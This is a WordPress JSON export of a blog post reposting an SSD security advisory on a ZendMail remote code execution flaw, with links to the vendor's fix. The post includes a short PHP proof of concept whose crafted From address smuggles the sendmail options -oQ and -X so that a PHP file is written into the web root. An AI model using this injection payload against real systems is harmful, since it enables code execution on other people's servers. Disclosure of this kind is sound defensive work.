{"id":6274,"date":"2017-01-23T14:07:56","date_gmt":"2017-01-23T22:07:56","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-125\/"},"modified":"2017-01-23T14:07:56","modified_gmt":"2017-01-23T22:07:56","slug":"news-125","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-125\/","title":{"rendered":"SSD Advisory &#8211; ZendMail Remote Code Execution Vulnerability"},"content":{"rendered":"<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>The following report describes a remote code execution vulnerability found in ZendMail. The vulnerability allows an attacker injecting additional parameters to the sendmail binary via the <em>From<\/em> address.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher Dawid Golunski (<a href=\"https:\/\/legalhackers.com\/\">https:\/\/legalhackers.com\/<\/a>) has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><span id=\"more-2903\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><\/p>\n<p>&#8220;ZendMail provides generalized functionality to compose and send both text and MIME-compliant multipart email messages. Mail can be sent with ZendMail via the MailTransportSendmail, MailTransportSmtp or the MailTransportFile transport. Of course, you can also implement your own transport by implementing the MailTransportTransportInterface.&#8221;<\/p>\n<p><a href=\"http:\/\/framework.zend.com\/manual\/current\/en\/modules\/zend.mail.introduction.html\"><em>http:\/\/framework.zend.com\/manual\/current\/en\/modules\/zend.mail.introduction.html<\/em><\/a><\/p>\n<p>When using ZendMail class from ZendMail\/Zend framework to send emails with MailTransportSendmail transport, a malicious user might be able to inject arbitrary parameters to sendmail program due to insufficient address sanitization. If an attacker can control email headers , he could bypass sanitization by adding additional quote characters within a malicious email address. <\/p>\n<p><strong>Prof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ebb48e5e575669867\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;?php    use ZendMail;  $mail = new MailMessage();  $mail-&gt;setBody(&#8216;This is the text of the email.&#8217;);  $mail-&gt;setFrom(&#8216;&#8221;AAA&#8221; -oQ\/tmp -X\/var\/www\/exploited.php BBB&#8221;@domain&#8217;, &#8216;Sender&#8217;s name&#8217;);  $mail-&gt;addTo(&#8216;hacker@localhost&#8217;, &#8216;Name of recipient&#8217;);  $mail-&gt;setSubject(&#8216;TestSubject&#8217;);    $transport = new MailTransportSendmail();    echo &#8220;gonna send&#8230;&#8221;;    $transport-&gt;send($mail);    ?&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0074 seconds] -->  <\/p>\n<p>will inject -oQ and -X parameters to sendmail command.<\/p>\n<p><strong>Vendor response<\/strong><\/p>\n<p>Release announcement can be found here: <a href=\"https:\/\/framework.zend.com\/blog\/2016-12-20-zf-2-4-11-released.html\">https:\/\/framework.zend.com\/blog\/2016-12-20-zf-2-4-11-released.html<\/a><br \/> Advisor can be found here:<a href=\"https:\/\/framework.zend.com\/security\/advisory\/ZF2016-04\"> https:\/\/framework.zend.com\/security\/advisory\/ZF2016-04<\/a><\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2903\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vulnerability Summary The following report describes a remote code execution vulnerability found in ZendMail. The vulnerability allows an attacker injecting additional parameters to the sendmail binary via the From address. Credit An independent security researcher Dawid Golunski (https:\/\/legalhackers.com\/) has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program Vulnerability Details &#8220;ZendMail provides generalized functionality &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2903\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; ZendMail Remote Code Execution Vulnerability<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6274","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6274","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6274"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6274\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6274"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}